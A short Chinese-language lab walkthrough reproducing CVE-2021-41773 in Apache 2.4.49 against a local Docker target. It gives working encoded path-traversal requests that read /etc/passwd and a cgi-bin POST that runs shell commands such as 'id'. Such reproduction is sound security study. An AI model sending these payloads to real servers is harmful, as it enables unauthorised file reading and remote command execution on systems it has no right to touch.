Cve-2021-41773漏洞复现
Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
版本等于2.4.49
穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的)
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
开启靶机:
docker-compose build
docker-compose up -d
- 访问本地8080端口
- 启动burp,开启抓包
- 构造Payload: /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1``
- 这里直接发现能够RCE
- 直接修改url参数:
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo Content-Type: text/plain; echo; id
- 发包!!!
直接命令执行!成功获取到id值
- 尝试whoami命令